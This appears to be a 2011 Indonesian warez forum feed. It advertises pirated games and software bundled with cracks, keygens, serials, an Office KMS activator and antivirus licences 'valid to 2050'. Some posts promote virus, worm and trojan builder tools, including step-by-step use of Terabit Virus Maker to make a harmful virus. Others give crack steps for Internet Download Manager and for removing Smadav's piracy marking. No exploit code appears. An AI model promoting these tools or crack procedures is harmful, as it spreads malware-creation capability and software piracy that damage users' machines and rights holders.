Kamis, 06 Oktober 2011


Download Kumpulan Game RIP FULL : Need for Speed Underground 2 With Chet | 230 MB

timhacker318 at Your first forum - 3 jam yang lalu
Quote: Need For Speed Underground 2 ( NFS-U2 ) ( 2004 ) from EA games is a racing game . This game has plenty of cars and each car has unique style of driving . In NFS-U2 there are many missions and races you have to complete . You have play modes like : career , free racing , cars tuning , internet play . Like in most Need For Speed games you are driving in a city . My impressions from this game : Pretty nice graphics , many vinyls stickers and many other tuning accessories ... more »

Download Software Operamini Tools | Cara Mudah Edit Operamini 4.2 | 148 Kb

timhacker318 at Your first forum - 5 jam yang lalu
Quote: Ada 3 pilihan operamini yang bisa di edit, yaitu operamini 4.2, operamini 4.2 labs dan splash operamini 5.1 beta.sis. Untuk cara2nya sangat mudah brada... Edit splash operamini 4.2 caranya sama dengan 4.2 labs. Xtract dulu file jar nya, kemudian buka operamini tolls, pilih splash screen dan pilih jenis operamini yang mau di edit, kemudian masukan file v dari opera mini yang telah di xtract tadi, setelah itu masukan gambar format .png yang mau di jadikan splash, dengan otomatis sytem ...more »

Download Kumpulan Software Portable Full : Corel WinDVD Pro v11.0.0.289.518226 | 56 Mb

timhacker318 at Your first forum - 5 jam yang lalu
Quote: Corel WinDVD Pro powerful player video files, DVD and Blu-ray discs. WinDVD delivers crystal clear and smooth image and full support for Dolby with the option of Dolby Virtual Speaker, and is capable of Hall Effect filters to improve image. What's New: New features exclusive to WinDVD® Pro 11 New Blu-ray 3D™ player support. Now get even more out of your 3D DVD playback experience. This latest Blu-ray 3D™ player has new 3D support that includes Blu-ray 3D™ and BDXL™ formats, ...more »

Download Kumpulan Game FULL : Pet Show Craze | 43 Mb

timhacker318 at Your first forum - 7 jam yang lalu
Quote: Fary Lagi Cedih nih Bis ci ayang CheRRy Jutek Nya Minta ampun xiixi!!, Cedih udah ah malah curhat. Game ini kurang lebih ceritanya brada atau sista jadi seseorang yang bisa memelihara hewan nah disini brada dan sista di uji dalam sebuah permainan bagai mana sih brada memelihara kucing yang baik misalnya apakah kalau minum di kasih baygon xixixi!! aaww ya udah yang penting game nya seru buat santai. Screenshot : A pet is an animal to be enjoyed and loved. So imagine ... more »

Download Kumpulan Game FULL RIP : Barbie Fashion Apprentice | 41 Mb

timhacker318 at Your first forum - 7 jam yang lalu
Quote: Aduh mau apa yah nih buat game cece ini xixixi!! game nih nemu di HD Keponakan fary Nobi xixii!! ya udah deh fary share game ini game cewek banget udah full tinggal main saja. Sista yang sangat suka akan fashion coba deh game ini game yang menguji insting dan fikiran sista dalam memakai gaun yang cantik , assesoris, sepatu, kalung Dll. xixii!1 namanya juga model harus cantik aaaaaaaww apakah brada juga suka mungkin karena brada lebay dan pingin game offline ini silahkan ikut ...more »

Download Kumpulan Game RIP FULL WORK : Game The Incredible Hulk | 230 Mb

timhacker318 at Your first forum - 8 jam yang lalu
Quote: Game Incredible Hulk Ini merupakan game Action 3D yang merupakan salah satu seri MARVEL yang cukup seru, kita ditantang untuk menghancurkan dan melarikan diri dari kempungan militer AS, landscape dan sudut pandang game ini cukup bagus, di game rip ini kalian bisa menggerakkan karakter dalam mengambil dan melemparkan lampu jalan, penutup lubang got, mobil, dan bahkan puing-puing beton yang disebabkan oleh melompat kuat nya. kelebihnnya juga pada ekplorasi game yang luas dan tidak kaku...Seru ... more »

Download 2011 Tema Android untuk Windows Xp | 2.5 Mb

Bunga Najwa at Your first forum - 9 jam yang lalu
Quote: Mungkin sudah tidak jaman lagi menggunakan Tema atau OS Windows XP. Karena sekarang sudah ada sistem operasi yang baru ya itu WIndows 7dan 8. Namun jangan sedih dulu brada Hehe,,meskipun sistem operasi Windows Xp termasuk kuno, dengan sedikit sentuhan tangan kreatif nantinya Windows Xp terlihat tidak terlalu kuno. yaitu dengan mengganti tema windows Xp seperti ANDROID. atau cocok bagi yang udah punya HP androidnya di serasikan dengan tema PC nya,, Caranya Silahkan brada tinggal ... more »

Download Software Billing-29 v.2.6 - Client Full | 3.5 Mb

Bunga Najwa at Your first forum - 11 jam yang lalu
Quote: Fitur BILLING-29 v.2.6 : 1. Blokir Aplikasi. Fitur ini berfungsi untuk memblokir aplikasi berdasarkan 3 kriteria, yaitu : Caption, Nama Aplikasi, dan Path Aplikasi. 2. Blokir Akses Internet. Fitur ini berfungsi untuk memblokir koneksi aplikasi yang terhubung ke internet (seperti Firefox, Opera, IE, YM, dll). 3. Transaksi Penjualan. Fitur ini ini berfungsi untuk mempermudah Brada dalam menghitung biaya transaksi penjualan (seperti makanan, minuman, barang, dan jasa). ... more »

Download Software Anti Crash With Serial | 2 Mb

Bunga Najwa at Your first forum - 12 jam yang lalu
Quote: Anti Crash Adalah Software kecil yang sangat berguna untuk mencegah Crash,Error,Freze,ataupun Blue Screen . Tidak hanya melindungi terhadap 95,8% crash, tetapi juga secara otomatis perbaiki crash,Error,Freze,ataupun Blue Screen , Sobat tidak perlu melakukan apa-apa, AntiCrash melakukan semua pekerjaan untuk Brada ^_^ . Fitur - Fitur : * Proteksi Total crashes and freezes AntiCrash melindungi komputer Sobat. Tidak hanya melindungi terhadap 95,8% crash, tetapi juga secara ... more »

Download 2011 Virus Effect Remover | Perbaiki Settingan Kumputer | 6 Mb

Bunga Najwa at Your first forum - 12 jam yang lalu
Quote: Banyak virus computer Indonesia yang mengubah setting computer seperti mendisable task manager, hidden files, folder option, registry serta setting vital lainnya di computer korbannya.Virus Effect Remover Solusinya , Virus Effect Remover adalah Software Yang sangat penting Jika Komputer Sobat Mengalami Ganguan Karena Virus ! dengan Virus Effect Remover sobat dapat Mengenablekan Task Manager , Folder Options Dan masih banyak Lagi Fitur-fitur yang disediakan Oleh Virus Effect Remover. ... more »

Download 2011 Kumpulan Tolls Pembuat Virus, Worm, Trojan

timhacker318 at Your first forum - 3 hari yang lalu
Quote: Mungkin Lumayan Seram kalau kita praktekan di kompi, lepi sendiri pasti bakalan membuat Pc jadi terinfeksi. Jadi untuk keamanan brada freeze dulu PC brada nya biar aman dan leluasa menguji tool pembuat Virus, Worm, Trojan wew!!. Peringatan : Keruksakan yang di timbulkan di tanggung brada Tidak akan lama-lama yah silahkan brada coba dan lihat-lihat software , aplikasi , tool Virus, Worm, Trojan ini : Untuk mendownload Silahkan brada Klik di namanya, ini langsung ke sumbernya ... more »

Download Google Chrome 16.0.889.0 - New | 22 Mb

timhacker318 at Your first forum - 3 hari yang lalu
Quote: Google Chrome 16.0.889.0 merupakan program browser internet yang sangat ringan dan tidak memakan resources memory komputer yang banyak seperti internet explore, loadingnya juga sangat cepat brada, desain yang minimalis dan belum lagi fasilitas-fasilitan di dalam browser google chrome serta masalah sekuriti atau keamanan saat kita sedang browsing di dunia maya yang cukup aman dengan menggunakan browser ini. The Dev channel has been updated to 16.0.889.0 for Windows, Mac and Chrome ... more »

Download 2011 FlashBoot 1.4.0.157 With crack | 4 Mb

timhacker318 at Your first forum - 3 hari yang lalu
Quote: FlashBoot adalah alat untuk membuat bootable disk USB, USB Flash Memory dan kartu kunci terutama. Apa manfaat dari perangkat tersebut untuk brada , tidak seperti kebanyakan media bootable, bootable USB Flash kunci sangat berguna dengan software ini brada akan di bantu membuat bootable untuk install ulang dengan flash disk. Selanjutnya silahkan saja brada pelajari xixii!! biar pintar Cara Install : 1. Silahkan brada setup dulu software trialnya, jangan di pakai dulu 2. Setup ... more »

Download Game PC Sniper Elite FULL

timhacker318 at Your first forum - 3 hari yang lalu
Quote: It might be difficult to get excited about yet another World War II shooter on the PC, especially since there are already a bunch of great, similarly themed shooters already available. Call of Duty 2, Brothers in Arms: Earned in Blood, and Day of Defeat all came out within the last few months, they're all great, and they're all about World War II. Despite its bad timing, worn-out source material, and lack of exposure, Namco and Rebellion's recent stab at the genre still does a lot to ... more »

Download 2011 : MiniTool Partition Wizard Professional Edition v6.0 With Serial | 8 Mb

Bunga Najwa at Your first forum - 3 hari yang lalu
Quote: MiniTool Partition Wizard Professional Edition v6.0 adalah sebuah software kecil yang dapat brada gunakan untuk memartisi Harddisk baik harddisk internal maupun Eksternal. Ukuran tools ini memang terbilang kecil (mini), namun kemampuannya teh tidak kalah dengan software partisi sejenis. Cocok untuk brada yang menginginkan software simple, cepat, namun fungsinya bagus. * BackUp dahulu Data pada Harddisk yang akan brada partisi agar tidak terjadi hal hal yang tidak diinginkan. * ... more »

Download Kumpulan Software Portable FULL : Membuat Komik Manga dengan Smith Micro Manga Studio EX v4 | 666 Mb

Bunga Najwa at Your first forum - 3 hari yang lalu
Quote: Anyone Can Create Manga and Comic Art Manga Studio Debut 4.0 is your all-in-one solution for stunning, ready-to-publish manga and comics. Invigorate your artwork using color, express motion using speed lines, apply dimension with screen tones and add dialog through built-in word balloons. Manga Studio helps you create professional manga and comics from start to finish! Start Creating Today Manga Studio Debut provides a fun straightforward way for you to start creating your ... more »

Download 2011 Membuat Virus Dengan Terabit Virus Maker V.3.2 | 600 Kb

Bunga Najwa at Your first forum - 3 hari yang lalu
Quote: jika Brada Mau membuat sebuah virus handal dan lumayan menjengkelkan juga bahaya di kompinya, pakai software yang satu ini ajah. Brada akan bisa membuat sebuah virus dari yang ringan sampai lumayan berat. Terabit Virus Maker V.3.2 merupakan software yang bisa membantu brada untuk membuat virus. caranya gak susah ko. Screenshot : Kurang lebih caranya seperti : 1. Buka software Terabit Virus Maker V.3.2 ( hati-hati saja bahaya) 2. Pilihlah pilihan yang ada di daftar ... more »

Download Anti Virus Smadav 2011 Rev. 8.7.1 With Keymaker | 6 Mb

timhacker318 at Your first forum - 3 hari yang lalu
Quote: SmadAV pada tanggal 1 Oktober 2011 kembali meluncurkan versi terbarunya yaitu SmadAV Pro 2011 Rev. 8.7.1. Pada SmadAV Pro 2011 Rev. 8.7 ini, smadav melakukan update database dengan penambahan 100 virus baru, perbaikan bugs, dan sedikit pengubahan dalam konfigurasi setting. Silahkan bagi brada yang membutuhkan dan ingin menjajal antivirus lokal ini di coba xixii!! . SMADAV TIMHACKER KEYMAKER PRO CREW KEYGEN WITH YOUR NAME ALL VERSION Cara Menghilangkan tanda bajakan : SMADAV ... more »

Download 2011 Software Menggambar Untuk Anak | 4 Mb

timhacker318 at Your first forum - 3 hari yang lalu
Quote: Apakah brada punya adik atau sudah punya anak xixi!! atau brada masih anak - anak wew!! kalau ya, fary akan share salah satu software mini yang lucu dan imut wih ini software bagus dapat membantu brada atau anak brada atau adik brada yang masih imut-imut (kalau brada mah amit-amit xixii!!). Dengan Software ini, Anak bisa menjadi cerdas dan kreatif. Ini adalah software menggambar yang cukup mudah di gunakan karena memang di desain untuk si kecil. Anak tinggal memilih gambar di ... more »

Download 2011 Internet Download Manager v6.07 build 12 + KeyMaker Life Time + IDM Optimizer | 5 Mb

timhacker318 at Your first forum - 3 hari yang lalu
Quote: New : Internet Download Manager v6.07 build 12. Fixed compatibility problems with different browsers including Internet Explorer 10 Final, Mozilla Firefox 4 and Mozilla Firefox 5 , 6 dan 7, Google Chrome. Improved FLV grabber to save videos from web players on YouTube, WOW! Google Video, MySpace TV, and other popular sites Cara Kerja Crack IDM Life Time : 1. Disconnect dari Internet 2. Jalankan KeyPatch 3. Pilih "Clear Previous registration data"" 4. Pilih "Patch Server Check" ... more »

Download 2012 Kumpulan 1000 Contoh Source Code Visual Basic | 58 Mb

timhacker318 at Your first forum - 3 hari yang lalu
Quote: Pada malam ini Fary akan berbagi Source Code lama tidak lagi share tentang pemrograman dengan visual basic nah sekarang fary ada beberapa kumpulan sample source code software untuk visual basic semoga dapat membantu brada yang sudah mahir ataupun lagi belajar. Dengan tidak mengurangi terimakasih kepada para programer kita berterima kasih kepada semua situs yang telah memberikan pencerahan tentang source code nanti ada di dalamnya yang akan brada download. Mungkin ... more »

Download : Game PC WWE Smackdown vs. Raw 2010

timhacker318 at Your first forum - 5 hari yang lalu
Quote: BSEditor: WWE SmackDown vs. Raw 2010 is a professional wrestling video game developed by Yuke's, and published by THQ,and is the sequel to its predecessor WWE SmackDown vs. Raw 2009. The game is based on the professional wrestling promotion World Wrestling Entertainment (WWE), and is named after the promotion's two brands: SmackDown and Raw. It also features the promotion's former third brand ECW. It is also the last game to feature the third promotion, ECW. Similar to previous games ... more »

Download Kumpulan Game RIP FULL : Zombie Driver | 137 Mb

Bunga Najwa at Your first forum - 5 hari yang lalu
Quote: Nobi teh nemuin game ini gak tahu work atau nggak. belum ada deh di Lepi, tapi kelihatanya work heheh,,, ^_^ langsung ajah Nobi amankan link game ini via IDWS kalau lihat ukuran game aslinya gede tapi yang ini kecil banget mungkin karena sudah jadi portable atau RIP. bagi yang mau download silahkan kalau ada yang bermasalah tolong di komentari nanti kami akan membantu solusinya sebisa kami. Terima Kasih Screenshot : Silahkan di download yah : Ke Blog Kami jah yah ... more »

Download Kumpulan LisensiAnti Virus KAV dan KIS 06, 07, 2011 dan KAV KIS 2012 Valid Sampai 2012 dan 2013 | 1 Mb

Bunga Najwa at Your first forum - 5 hari yang lalu
Quote: Bagi Brada dan teman semua pengunjung Forum www.teamhacker.4ulike.com dan blog kami, bunga akan share Download Kumpulan LisensiAnti Virus KAV dan KIS 06, 07, 2011 dan KAV KIS 2012 Valid Sampai 2012 dan 2013 yang mungkin yang mencari lisensi nya kak fary jarang update tapi alhamdulillah sekarang ada. Biasanya bulan baru update lisensi kan,,,Hehee ^_^. Didalamnya yang brada dan teman download sudah kumplit ada lisensi trial dan full valid sampai 2012 dan 2013. semoga Kumpulan ... more »

Download Software 2011 : Revo Uninstaller Pro v2.5.5 Full Keygen | 7.5 Mb

timhacker318 at Your first forum - 5 hari yang lalu
Quote: Revo Uninstaller Pro v2.5.5, Merupakan suatu aplikasi utilities yang berguna sebagai penghapusan aplikasi dan pembersih sistem komputer seperti sisa file dari proses penghapusan aplikasi. Selain itu Revo Uninstaller Pro juga menyediakan fasilitas seperti pembersihan sisa file sampah (Junk File), Clear Web Browser, Windows Cleaner dan Office Cleaner. Maka dari itu aplikasi ini di sebut sebagai aplikasi berbasis utilities. Screenshot : Features : * Real-Time installation ... more »

Download Software 2011 : Animated GIF Producer 5.1 Full With Crack | 3 Mb

timhacker318 at Your first forum - 6 hari yang lalu
Quote: Apakah brada pernah melihat image/foto yang animasi/bisa bergerak wew kalau belum katarak aww xixixi!! jika brada pernah melihatnya mungkin image/foto itu dibuat menggunakan Animated GIF Producer 5.1 Full..Animated GIF Producer 5.1 Full dapat membuat foto yang berjenis GIF beranimasi/bergerak..software ini juga dapat dialihfungsikan untuk membuat banner animasi, jadi bagi brada yang tidak mempunyai kemampuan graphics and design tapi ingin membuat GIF animasi sederhana dapat mencoba ... more »

Download Kumpulan Software Portable Full : Adobe Photoshop Lightroom v3.5 Final | 93 Mb

Bunga Najwa at Your first forum - 6 hari yang lalu
Quote: Adobe® Photoshop® Lightroom® 3.5 adalah software yang dapat membantu brada untuk mengelola, mengedit semua file photo brada dengan beberapa sentuhan effek dan konvert ukuran image brada. Software canggih deh intinya,, Hee. ^_^ apapun yang brada inginkan bisa dengan sentuhan software Adobe® Photoshop® Lightroom® 3.5 ini. Apa lagih software ini teh telah portable tinggal pakai dan Nobi juga kak fary telah mengetes software ini hasilnya image bagus. Terimakasih. Features: Superior ... more »

Download Kumpulan Game RIP FULL : Mechanic Infantry | 106 Mb

Bunga Najwa at Your first forum - 6 hari yang lalu
Quote: Game ini teh seru banget kecil tapi banyak stagenya, Baca sedikit kisahnya yah : Dalam dunia yang diatur oleh mesin, infanteri Brada bertahan dengan energi yang disediakan oleh generator yang tiba-tiba rusak. Teman-teman telah menghilang dan kurangnya sumber daya akan mendorong Brada untuk melawan kepunahan ... Sekarang, berani bahaya dan memperbaiki sumber energi untuk menghemat rekan-rekan Brada!. Mechanic Infantry is a 2D old school platformer including : - 50+ levels - ...more »

Download Anti Virus : Panda Internet Security 2012 Full Serial | 74 Mb

Bunga Najwa at Your first forum - 6 hari yang lalu
Quote: Panda Internet Security 2012 adalah anti virus yang Metode Scanning dan Fitur-fiturnya yang canggih menjadi salah satu kelebihan Panda Internet Security 2012 dibandingkan dengan Antivirus lainnya, Tapi Panda Internet Security 2012 ini cukuplah tangguh untuk memberantas Virus dan Malware jaman sekarang, dan pada versi terbaru ini, Panda Internet Security 2012 ini menambahkan beberapa Fitur baru seperti Panda Browser Plus, Peningkatan Kecerdasan Scaning, Backup Online, dll. Screenshot ... more »

Download Software 2011 GCell Full Pembukuan Counter HP | 5.8 Mb

Bunga Najwa at Your first forum - 6 hari yang lalu
Quote: GCeel adalah software yang dapat membantu brada dalam usaha counter HP walau software ini minimalis dan sebenarnya cocok bagi pengusaha Counter HP rumahan Fitur-fiturnya masih sangat terbatas. Tapi Aplikasi ini juga masih mencangkup Fitur seperti, Penyimpanan Data, Voucher / Kartu Perdana, Accesories Counter, Service / Pelayanan, dll. Screenshot : Fitur-fitur yang tersedia : * Stock Handphone * Stock Vouche * Stock Kartu Perdana * Accesories * ... more »

Download 2011 Game Maker 8.0 pro Full Crack | 21 Mb

timhacker318 at Your first forum - 1 minggu yang lalu
Quote: Game Maker 8.0 pro, merupakan sebuah software yang di gunakan untuk membuat game denga cara yang mudah karna dengan software ini brada tidak perlu menguasai terlalu dalam bahasa pengcodingan dalam membuat sebuah game. selain itu Game Maker 8.0 pro ini juga dilengkapi dengan bermacam-macam fitur dimulai dari penambahan sound efect,animasi, dan juga scriptnya yang masih dalam kategori pemula-menengah. Sebenarnya sudah pernah fary share tentang software yang satu ini tapi ... more »

Download Nero 10 Lite Terbaru 2011 With SN | 43 Mb

timhacker318 at Your first forum - 1 minggu yang lalu
Quote: Nero 10 Lite adalah salah satu paket software terbaik versi minimalis untuk merekam ke CDR, CDRW dan DVD drive. Memungkinkan Brada untuk menggunakan sebagian besar model drive, dengan catatan sebagai AudioCD, dan komputer drive, termasuk boot, serta video ( format video CD dan Super Video CD ) dan DVD. Installer Nero 10 Lite meliputi produk berikut: - Nero BurningROM - Nero Express - Nero Cover Designer - Nero ToolKit - Nero DiscSpeed - Nero WaveEditor Screenshot ... more »

Download Kumpulan Software Portable Full : My Autoplay v9.59s Pro | 32 Mb

timhacker318 at Your first forum - 1 minggu yang lalu
Quote: My Autoplay Pro ini adalah software yang dapat membantu brada dalam membuat autorun CD, DVD ataupun Software yang telah brada buat dengann VB6 dan lainya. Software ini sangat mudah digunakan dengan banyak fitur yang di sajikan buat brada intinya brada akan dimanjakan dengan software yang satu ini untuk lebih lanjutnya silahkan brada baca : My Autoplay Professional a faster and easier way to create software applications for the Microsoft Windows platform, Is best suited for ... more »

Download Mini KMS Activator v1.31 Office 2010 | 1 Mb

timhacker318 at Your first forum - 1 minggu yang lalu
Quote: Mini KMS Activator v1.31 Office 2010 merupakan aktivator office 2010 yang berguna dalam pengaktivasi software sehingga menjadikan office 2010 tersebut menjadi full version. mudah di pakai tinggal klik langsung brada akan tersenyum xixii!! What's New? : * Optimized detect Office 2010 products on 64 edition of Windows. * Setting of counter of rearms Office 2010 (counter is working for the rearms made with activator only). * Install/Uninstall KMS emulator as Windows ... more »

Software Nonton 3000 Channel TV Dengan Direct Satellite PC v2.0.5.0 Final Full | 10 Mb

timhacker318 at Your first forum - 1 minggu yang lalu
Quote: Direct Satellite PC merupaan software TV Satelit yang bisa brada manfaatkan untuk menonton lebih dari 3000 Channel secara Gratisan hanya dengan bermodalkan Koneksi Internet. Hebatnya, Direct Satellite PC ini tidak membutuhkan Hardware atau Hal semacamnya untuk Instalasi, hanya dengan memiliki Koneksi Internet yang Lancar brada sudah bisa menonton TV Satelite secara Gratisan, tak heran jika Direct Satellite PC ini menjadi salah satu software Terbaik di Tahun 2010 dan 2011 ini. Dari pada ... more »

DOWNLOAD 2011 : Magic-M MINI XP.iso | Windows XP Mini LiveCD | 38 Mb

timhacker318 at Your first forum - 1 minggu yang lalu
Quote: Ini mungkin windows xp terkecil yang paling stabil di dunia. Hanya dengan berupa file iso 38 MB, Brada bisa membooting pc brada dan melakukan hal penting yang Brada suka, termasuk membakar cd/dvd bila perlu. Dengan memanfaatkan kestabilan Ramdisk, windows xp livecd ini menjadi stabil dan begitu cepat alias gesit. Berbeda dengan windows live cd yang dihasilkan dari BartPE builder atau winbuilder, xp live ini membuat semacam image file kemudian mengekstraknya ke dalam ramdisk, dan berjalan ... more »

Merubah Tampilan Windows xp , Vista , 7 Dengan Aston 2.0.3 + Crack + Keygen | 15 Mb

Bunga Najwa at Your first forum - 1 minggu yang lalu
Quote: Aston 2.0.3 adalah sebuah software yang mirip dengan Window Blinds dimana berfungsi sebagai pengubah tampilan desktop brada. Dengan Aston 2.0.3 + Crack + Keygen ini, tampilan desktop brada akan lebih bervariasi dan menarik. Jadi buat yang bosen dengan tema windows yang itu itu saja, mungkin bisa coba software ini. Software nya yang kecil tapi hasilnya maksimal brada dapat di manjakan dengan semua tampilan software Aston 2.0.3 ini. Screenshot : 4. Selanjutnya akan ... more »

Download Kumpulan Game FULL RIP : Chopper Battle | 137 Mb

Bunga Najwa at Your first forum - 1 minggu yang lalu
Quote: A challenging game to say the least. Your mission, if you choose to accept it, is to rescue military personnel that are stranded behind enemy lines. Sounds easy right? Wrong. In fact it can give you many a headache -- as I soon found out. The problem is you have to somehow get past an assortment of tanks, planes, and choppers. While you locate and pick up the military personnel to deliver them to a designated friendly air base. Each level has one pick up location and one drop ... more »

Download Software Neo's SafeKeys 2011 | Software Anti Keylogger | 1.2 Mb

Bunga Najwa at Your first forum - 1 minggu yang lalu
Quote: Neo’s SafeKeys,adalah sebuah software anti-logging yang sangat bermanfaat untuk menghindari lognya keylogger dari keyboard.Jika Brada harus online di warnet / fasilitas umum karena tidak adanya fasilitas internet pribadi,maka Neo’s SafeKeys adalah software yang harus Brada punya. Keunggulan Neo’s SafeKeys: 1.Kita tidak perlu menggunakan keyboard, sehingga program keylogger tidak ... more »

Remix Musik Dengan PCDJ DEX v2.0.9 With Crack | 14 Mb

Bunga Najwa at Your first forum - 1 minggu yang lalu
Quote: PCDJ DEX v2.0.9, adalah software yang sangat berguna sekali dan dapat membantu brada dalam meracik/meremix sebuah musik. software ini mirip dengann Atomix Virtual Dj dari tampilan dan cara pemakaian. Namun ada kelebihan tersendiri yang dipunyai software PCDJ DEX v2.0.9 ini seperti mudah dalam pemakaian, fitur yang komplit dan lebih banyak daripada Atomix Virtual Dj dan tentunya ukuran si softwarenya yang kecil tidak membebani hardisk. Screenshot : Cara ... more »

Game PC Call of Duty 2 FULL | 33,191 KB

timhacker318 at Your first forum - 1 minggu yang lalu
Quote: Nama Game: Call of Duty 2 OS: Windows XP and Vista Type Game: Petualangan Silahkan brada dan Sista Download ea, Semoga bermanfaat dan buat Happy xixiixi!!

Download Software Portable : Picture Collage Maker Pro v3.1.4.3534 | 57 Mb

Bunga Najwa at Your first forum - 1 minggu yang lalu
Quote: Picture Collage Maker Pro v3.1.4.3534 , adalah software yang cocok deh bagi brada yang suka akan keindahan atau edit photonya ditambahkan animasi atau frame yang gak perlu di edit lagih. Software ini dapat memberikan kepuasan bagi yang memakainya karena banyak fitur di dalamnya apalagih softwarenya udah portable. ^_^ Key features » Extremely easy to use » Create Collages » Photo Collage Wizard » Real-Time Editing » Support JPG, BMP, TIFF, GIF, WMF, TGA, PNG etc » Use ...more »

Download Software Portable Full : Coolcolor Text Generator | 3 Mb

timhacker318 at Your first forum - 1 minggu yang lalu
Quote: Dahulu pernah fary share tentang software ini, namun karena ada permintaan yang portable maka fary share kembali. Coolcolor Text Generator adalah software yang akan membantu brada untuk membuat secara langsung animasi teks yang bisa brada pilih sesuai dengan keinginan, cocok untuk blog dan forum. Silahkan brada lihat beberapa contohnya : Yang fary pilih adalah Rainbow xixixi!! 1. Reversed www.teamhacker.4ulike.com 2. Symetrical www.teamhacker.4ulike.com 3. ... more »

Download Advanced JPEG Compressor 2011 | 3 Mb

timhacker318 at Your first forum - 1 minggu yang lalu
Quote: Advanced JPEG Compressor 2011 merupakan software yang dapat membantu brada untuk memperkecil image buat posting misalnya atau mau di masukan ke HP dan lainya. Software Advanced JPEG Compressor 2011 terbaru ini sangatlah mudah di gunakan, karena tidak terlalu banyak fitur dan yang paling hebat tidak hanya file image .jpg yang bisa di kompress hampir semua file image bisa. Software Advanced JPEG Compressor 2011 patut brada coba xixixi!! apa lagih sudah portable. Silahkan brada ... more »

Download 2011 : Driver Genius Professional 10.0.0.761 Full | 5.8 Mb

timhacker318 at Your first forum - 1 minggu yang lalu
Quote: Driver Genius Professional merupakan salah satu software yang berguna bagi brada untuk update driver PC atau Laptop. Driver Genius Professional ini juga dapat mengatisipasi suatu driver yang kiranya ketika menginstal terjadi kesalahan nah masalah tersebut bisa Brada gunakan dalam fasilitas Restore Dirver. ketika Brada menginstal akan kaget dengan penggunaan bahasanya, untuk cara penginstalannya klik tombol yang berakhiran seperti ">" klik tanda seperti itu seterusnya hingga proses ... more »

Download Software Ashampoo Core Tuner 2.01 : OptimalkanDaya Prosesor With Patch | 11 Mb

timhacker318 at Your first forum - 1 minggu yang lalu
Quote: Optimal distribution of computing power – become your system’s operator Are you familiar with this? You would like to watch a movie and it is jerky. That is because the computer is busy handling several tasks simultaneously and the processor power is not used in the best possible way. Computers aren’t fun like this! When several processes are executed at the same time it is highly important for high-end computers as well as older PCs that the processor power is distributed and ... more »

Download Kumpulan Game PC FULL : SpongeBob And The Clash Of Triton | 74 Mb

Bunga Najwa at Your first forum - 1 minggu yang lalu
Quote: Game lucu paling aku sukai Love U Spongbob heheh,, Game features: *Kalahkan Triton untuk menyelamatkan Bikini Bottom dengan menjadi SpoengeBob atau Patrick dengan 8 unique character styles *Naikkan level mereka untuk meningkatkan Health, Attack, Jump, dan Speed mereka agar menjadi lebih kuat *Dapatkan Special Moves mereka (SpongeBob's Flying Drop Kick dan Patrick's Lava Blast) *Challenge 5 unique areas with 25 exciting levels. System Requirements: Windows XP/Vista/7 2 GHz 512 ... more »

Download Kumpulan Game PC FULL : Wedding Dash 4 Ever Full | 32 Mb

Bunga Najwa at Your first forum - 1 minggu yang lalu
Quote: Game ini Teh, game yang santat Nobi sukai deh bis, seru memainkanya heheh, Wedding Dash 4 - Ever merupakan versi lanjutan dari game yang bernama Diner Dash 5 Boom Collector's Edition dan versi-versi lanjutannya, game yang biasa akrab dengan sebutan namanya yaitu Diner Dash yang permainannya dilakukan pada seorang pelayan yang berpindah-pindah tempat yang bertujuan untuk membangun restoran milik pribadi. Namun pada versi ini yaitu Wedding Dash 4 - Ever tidak lagi bekerja untuk ... more »

Download Kumpulan Game Portable FuLL : Street Fighter Alpha 3 | 32 Mb

Bunga Najwa at Your first forum - 1 minggu yang lalu
Quote: Publisher: Capcom Developer: Crawfish Int. Genre: 2D Fighting ESRB: TEEN Number of Players: 1-2 Game Spot Score: 8.4 info: www.gamespot.com Screen Shots: Password If Need : timhacker318 Silahkan di download Yah : Download Kumpulan Game Portable FuLL : Street Fighter Alpha 3 | 32 Mb

Download Kumpulan game FULL RIP : Twisted Metal 2 | 32 Mb

Bunga Najwa at Your first forum - 1 minggu yang lalu
Quote: Untuk memainkannya silahkan menggunakan emulator PS1, Publisher: SCEA Developer: SingleTrac Genre: Car Combat Release Date: Oct 31, 1996 (US) ESRB: TEEN ESRB Descriptors: Animated Violence, Animated Blood Number of Players: 1-2 Game Spot Score: 8.8 Size: 32.6MB info: gamespot Screenshot : Password If Need : timhacker318 Silahkan di download Yah : Download Kumpulan game FULL RIP : Twisted Metal 2 | 32 Mb

Download Kumpulan Game FULL RIP : Game MotoGP 3 URT | 581 Mb

Bunga Najwa at Your first forum - 1 minggu yang lalu
Quote: Bunga Mau share game da teman yang minta di PM katanya tolong carikan game yang MotoGP 3 URT setelah mencari ada, bagi yang mau silahkan di coba tapi bunga belum mendownloadnya kurang suka game sport ^_^ Seri MotoGP adalah motor definitif racing game untuk kotak-X dan PC. Permainan akurat menangkap kegembiraan balap motor Grand Prix. Kali ini, MotoGP 3 adalah mengambil waralaba yang ekstrim, memperluas luar alam Grand Prix balap untuk menggabungkan adrenalin tinggi Street Racing. ... more »

Download 2011 Zahir Accounting Portable | 5 Mb

Bunga Najwa at Your first forum - 1 minggu yang lalu
Quote: Zahir Accounting adalah software yang diperuntungkan bagi para Akuntan yang ingin dengan mudah mengelola Pembukuan Akutansinya, tidak hanya itu Zahir Accounting ini juga mendukung banyak Fitur canggih seperti Laporan Keuangan, Jurnal Otomatis, Laporan-laporan yang dapat menampilkan Data Transaksi dan masih banyak lagi. Zahir Accounting ini juga mendukung Bahasa Indonesia loh ^_^ , jadi tidak perlu susah-susah untuk memahami lebih lanjut tentang software ini. Fitur-fitur Zahir Accounting ... more »

Download Smadav 2011 Rev. 8.6 Withh Keymaker ( September - Oktober ) | 6 Mb

Bunga Najwa at Your first forum - 1 minggu yang lalu
Quote: Smadav 2011 Rev. 8.6 : Penambahan database 100 virus baru, Penyempurnaan fitur Smadav-Updater, Pendeteksian khusus untuk virus Ramnit, Sality, & OneLetter yang menyebar via USB Flash Disk, dsb. SMADAV TIMHACKER KEYMAKER PRO CREW KEYGEN WITH YOUR NAME ALL VERSION Cara Menghilangkan tanda bajakan : SMADAV 8.3 isi kolom nama : anti-pembajakan dan kolom key : dikosongkan SMADAV 8.6 isi kolom nama : anti-bajakan dan kolom key : dikosongkan CARA BUAT KEY SMADAV DENGAN NAMA BRADA ... more »

Nod32 3.0.621.0 With licence to 2050 year.rar (18,383 KB)

timhacker318 at Your first forum - 1 minggu yang lalu
